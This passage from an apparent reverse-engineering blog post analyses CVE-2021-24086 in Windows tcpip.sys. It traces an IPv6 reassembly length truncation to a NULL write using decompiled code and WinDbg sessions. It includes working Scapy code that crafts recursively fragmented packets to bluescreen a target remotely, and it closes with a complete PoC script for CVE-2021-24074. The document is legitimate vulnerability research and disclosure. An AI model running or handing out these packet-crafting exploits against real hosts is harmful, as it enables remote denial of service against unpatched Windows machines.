Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back to this BSoD. After reading Ipv6pReassembleDatagram a few times, I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference; bingo, that is looking good!

After carefully analyzing the crash, I started to realize that the issue had been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // ...
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer has just been allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer takes the CurrentMdlOffset < Amount branch and calls NdisRetreatNetBufferDataStart, which is publicly documented. According to the documentation, it allocates an MDL using NetioAllocateMdl, since, as mentioned above, the network buffer is empty. One thing to notice is that the number of bytes passed to NetioRetreatNetBuffer, HeaderAndOptionsLength, is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, the function needs a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as a way to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several times, it was still a little confusing to me, so I figured I'd throw NDIS into IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation, something stands out. Because NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the NetBuffer->DataLength < BytesNeeded condition whenever HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. If HeaderAndOptionsLength is 0x1337, NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. NetioRetreatNetBuffer allocates only 0x1337 bytes (because of the truncation), but NdisGetDataBuffer is then called with the full 0x31337; the network buffer is not big enough, we hit the NetBuffer->DataLength < BytesNeeded condition, and the call fails.
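
Here is the same reasoning written out as a tiny model of the two calls (the values are the same illustrative ones as above, not from a real capture):

# Illustrative model of the truncation mismatch described above (not real NDIS code).
header_and_options_length = 0x31337

retreat_amount = header_and_options_length & 0xFFFF  # uint16_t cast: NetioRetreatNetBuffer gets 0x1337
bytes_needed   = header_and_options_length           # NdisGetDataBuffer gets the full 0x31337

nb_data_length = retreat_amount                      # the NB only has 0x1337 bytes of backing data
assert nb_data_length < bytes_needed                 # NetBuffer->DataLength < BytesNeeded -> returns NULL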

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual, we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *

# Both fragments use the same fragment id, so they belong to the same reassembly group.
id = 0xdeadbeef
# First fragment: offset 0, 'more fragments' set, carries the UDP header.
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
# Last fragment: 'more fragments' cleared; the offset field is in 8-byte units.
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has a 0x28-byte backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial, right? That's what I initially thought. After trying various things to achieve this, I quickly realized it wouldn't be that easy. The main issue is the MTU: network devices basically won't let you send packets larger than the link MTU, which is around 1,500 bytes on typical Ethernet. Online content suggests that some Ethernet cards and network switches allow you to bump this limit. Because I was running my tests in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue is that Hyper-V didn't let me do that. The only parameter I found allowed me to bump the limit to about 9k, which is very far from the 64k I needed to trigger this issue. At this point I was frustrated: I felt so close to the end, but no cigar. Even though I had read that this vulnerability could be triggered over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it had to go through regular network equipment, and there was no way a 64k packet would make it. But I ignored this hard truth for a while.

Eventually, I accepted that I was probably heading in the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one I would be able to trigger with packets thrown from the internet. Maybe, though, there was another code path with a very similar pattern (retreat + NdisGetDataBuffer) that would also result in a bugcheck. I noticed that the TotalLength field is also truncated a bit further down in the function and written into the IPv6 header of the packet. This header is eventually copied into the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16 bits.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that the size written into the IPv6 header ends up
// smaller than the real total size. It's kind of hard to see how this would
// cause a subsequent issue, but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code that reads this Ipv6.length (which is truncated, since __ROR2__ expects a uint16_t) and that something bad might happen as a result. Granted, the length would end up smaller than the actual size of the packet, and it was hard for me to come up with a scenario where this would cause an issue, but I chased this theory anyway because it was the only thing I had.
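
To make the truncation concrete, here is a quick model of that byte swap (the value is purely illustrative):

# Illustrative model of `Reassembly->Ipv6.length = __ROR2__(TotalLength, 8)`:
# a 16-bit rotate by 8, i.e. htons applied to a truncated value.
def ror2(value, count=8):
    value &= 0xFFFF                            # __ROR2__ operates on a uint16_t
    return ((value >> count) | (value << (16 - count))) & 0xFFFF

total_length = 0x10010                         # hypothetical TotalLength value, > 0xffff
print(hex(ror2(total_length)))                 # 0x1000 -> stored bytes are 00 10, so the header
                                               # advertises 0x10 bytes instead of 0x10010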

What I started to do at this point was to audit every demuxer we saw earlier. I looked for ones that use this length field somehow, and for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically, I also heavily used WinDbg to verify my work. I used hardware breakpoints to track accesses to those two bytes, but no hit. Ever. Frustrating.

After trying and trying, I started to think I might be heading in the wrong direction again. Maybe I really needed to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right, so I decided to start fresh again. Going back to the big picture, I studied the reassembly algorithm a bit more and diffed again, just in case I had missed a clue somewhere, but nothing...

Could I maybe fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we can use reassembly as a primitive to stitch fragments together; so instead of trying to send one very large fragment, maybe we could break it down into smaller ones and have them stitched back together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't see anything that would prevent it. The idea was blurry, but it felt worth a shot. How would it actually work, though?

Sitting down for a minute, this is the theory I came up with: craft a very large fragment with enough headers to trigger the bug, assuming I could trigger another reassembly; then fragment this fragment so that it could be sent to the target without violating the MTU.
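
Before looking at the Scapy below, a quick back-of-the-envelope check that this is even possible: a single Destination Options header can be at most 2048 bytes (its Hdr Ext Len field is 8 bits, counted in 8-byte units), so a few dozen of them are enough to push the unfragmentable part past 0xffff. The numbers below are illustrative, not the exact ones used in the PoC:

# Back-of-the-envelope: how many maximal Destination Options headers are needed
# for the unfragmentable part to exceed 0xffff bytes? (illustrative only)
MAX_DESTOPT = (0xff * 8) + 8        # Hdr Ext Len is 8-bit, in 8-byte units -> 2048 bytes max
TARGET = 0x10000                    # we want the unfragmentable part to exceed 0xffff

needed = -(-TARGET // MAX_DESTOPT)  # ceiling division
print(needed)                       # 32 maximal headers ~= 0x10000 bytes of options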

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)
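
The frag6 helper is not shown in the snippet (it lives in the full PoC); assuming it simply wraps the oversized payload in an IPv6 + Fragment header and splits it into pieces small enough for the wire, a rough equivalent built on Scapy's fragment6 could look like this:

# Rough stand-in for the frag6 helper used above (an assumption, not the author's code).
from scapy.layers.inet6 import IPv6, IPv6ExtHdrFragment, fragment6
from scapy.sendrecv import send

def frag6_sketch(target, frag_id, payload, frag_size, nh = 60):
    # nh must describe the first header of `payload` (60 = Destination Options here).
    pkt = IPv6(dst = target) / IPv6ExtHdrFragment(id = frag_id, nh = nh) / payload
    # fragment6 splits the packet at the Fragment extension header into
    # pieces of roughly `frag_size` bytes each.
    return fragment6(pkt, frag_size)

# e.g. send(frag6_sketch(args.target, frag_id, reassembled_pkt, 1280), iface = args.iface)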

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great, because I honestly didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment; as a reminder, here is how it was crafted:

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

It is a fragment that is 0x10020 bytes long (65,568 bytes), and you can see that the ndiskd extension walks the long MDL chain describing its content. The last MDL holds the UDP header part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this kick off another reassembly?

Well, let's see if the below works, I guess:

# A tiny trailing fragment for the same group: m = 0 marks it as the last
# fragment, and the offset field is expressed in 8-byte units.
reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Moral of the day: don't leave any stone unturned, follow your intuitions, and reach the state of no unknowns.

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver, found by Microsoft's own @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers, as this is a fairly long and hairy post, but if you made it all the way here you should join and come hang out in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people who enjoy low-level subjects. Hopefully we can also generate more interest in external contributions :)

Last but not least, special greets to the usual suspects: @yrp604, @__x86 and @jonathansalwan for proofreading this article.

Bonus: CVE-2021-24074

Here is the PoC I built based on the high-quality blog post put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()